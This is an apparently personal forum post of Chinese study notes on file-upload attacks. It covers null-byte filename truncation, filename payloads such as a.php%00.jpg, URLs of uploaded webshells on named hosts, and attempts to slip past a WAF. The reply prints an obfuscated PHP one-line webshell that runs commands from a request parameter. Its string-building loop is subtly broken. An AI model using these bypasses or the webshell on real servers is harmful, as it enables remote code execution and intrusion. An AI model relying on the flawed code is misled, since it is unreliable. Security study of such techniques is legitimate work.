老莫的笔记本  
  
查看: 1200|回复: 1

上传文 测试学习记录

[复制链接]

664

主题

881

帖子

5167

积分

超级版主

Rank: 8Rank: 8

积分
5167
发表于 2019-6-2 23:58:16 | 显示全部楼层 |阅读模式
当字符有  %00(空字节) 就会被服务器认作为结束符。

空字节漏洞存在:
        PHP 不同版本存在这个漏洞;
        不同函数也存在这个漏洞;例如 转码 urldecode()
       
       
        图片上传基本流程:
        1.图片是否正常上传;
        2.图片上传内容是否被感染(内容替换)
        3.上传的域名是否是目标服务器;
          3.1 如果不是那么判断图片服务器是否解析(php,asp....)
        4.上传的目录是否支持解析(php aspx jsp cfm ---)
       
                解释3与4: 所谓解析 就是判断目标服务器是否存在相应的代码运行环境
       
       
       
        文件截断上传
                走一遍视频后总结:
                目标:上传的文件尾缀为.php 的 可运行文件 ;
                前提条件:
                        1. 把图片右击用记事本打开,把PHP 一句话木马代码塞进去 再保存 ;
                        2. 文件成功上传 ;
                        3. 把上传的图片另存为存下来,再用编辑器打开, 看代码在不在【也就是被没被感染】,在就继续倒腾下面的
                手段:黑盒测试中,利用
                        1. 修改文件名: a.php%00.jpg  、 a.php .jpg  、 a.jpg%00.php 、 a.jpg .php  
                        2. 修改hash 值: 把指定位置改成  00   [可结合1 尝试]
                       
               
                获得图片路径
                http://www.huake94.top/da/data/a ... vvnhvyvwsdnudpc.png  【这是上传到 下面是ftp上传到】
               
                http://www.huake94.top/da/data/attachment/forum/201905/27/5.png  [小图模式 <是?的链接]
               
                http://www.huake94.top/da/data/attachment/forum/201905/27/7.png  [< 直议模式 图模式]
               
                http://www.huake94.top/da/data/attachment/forum/201905/27/52.php  [小图模式 <是?的链接 的PHP版本]
               
                http://www.huake94.top/da/data/attachment/forum/201905/27/72.php  【直接把7改成了php 文件】
               
                http://www.huake94.top/da/data/attachment/forum/201905/27/2.php  【直接连接】
               
                实际情况 ,在我链接的时候 提示: 服务器连接被重置  ; 反应为 安全狗
               
                参考资料: http://www.360doc.com/content/18/0213/19/30583588_729816778.shtml
               
                // 上述失败 采用变量方式 再尝试绕过PHP
               
                采用第二种方式
               
                一句话木马未改动版图片
               
                        http://a.wangjingting.top/upload/image/20190116/2.php  [小图模式 <是?的链接]
               
                        http://a.wangjingting.top/upload/image/20190116/7.png  [小图模式 <是?的链接]
               
                        http://a.wangjingting.top/upload/image/20190116/5.png  [< 直议模式 图模式]
               
                        http://a.wangjingting.top/upload/image/20190116/52.php [小图模式 <是?的链接 的PHP版本]
               
                        http://a.wangjingting.top/upload/image/20190116/72.php  【直接把7改成了php 文件】
               
                一句话木马 变量版 地址 【上述地址全部玩完,经检测 发现该变量版不行 倒是 7.png 可以访问, 特点: 被告该处了< 括号而不是编码?】
               
                        http://www.huake94.top/da/data/attachment/forum/201905/27/8.php  【直接连接】
               
                        http://www.huake94.top/da/data/attachment/forum/201905/27/48.php  【图片名称改掉】
               
                        http://www.huake94.top/da/data/attachment/forum/201905/27/48.png  【直接是图片】
               
                        我的主机版
                       
                        http://a.wangjingting.top/upload/image/20190116/8.php  【直接连接】
               
                        http://a.wangjingting.top/upload/image/20190116/48.php  【图片名称改掉】
               
                        http://a.wangjingting.top/upload/image/20190116/48.png  【直接是图片】
       
                参考文献: https://blog.csdn.net/cic10235/article/details/52104010  【变量木马的制作 尝试绕过安全狗】
       
       
       
        选用第三种 来自乌云的 一句话木马去你奶奶个腿版 6.PHP
       
                参考文献:https://www.secpulse.com/archives/38355.html
       
                生成文件并上传:
               
                http://a.wangjingting.top/upload/image/20190116/6.php  【直接连接】
               
                        http://a.wangjingting.top/upload/image/20190116/46.php  【图片名称改掉】
               
                        http://a.wangjingting.top/upload/image/20190116/46.png  【直接是图片】
       
       
       

回复

使用道具 举报

664

主题

881

帖子

5167

积分

超级版主

Rank: 8Rank: 8

积分
5167
 楼主| 发表于 2019-6-12 00:25:01 | 显示全部楼层
                                                               
        再次寻找 可以 过安全的一句话木马 https://www.freebuf.com/articles/web/125084.html        【这个是木马上传方式的整体思路】       


                        木马链接位置: http://a.wangjingting.top/upload/image/20190117/m.php
                        【
                        选用的语句4:
                                        <?php

        /*

        PHP一句话木马

        assert($string)

        */

        $arr = array('a','s','s','e','r','t');

        $func = '';

        for($i=0;$i<count($arr);$i++) {

        $func .= $func . $arr[$i];

        }

        $func($_REQUEST['c']);

        ?>
                        】
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表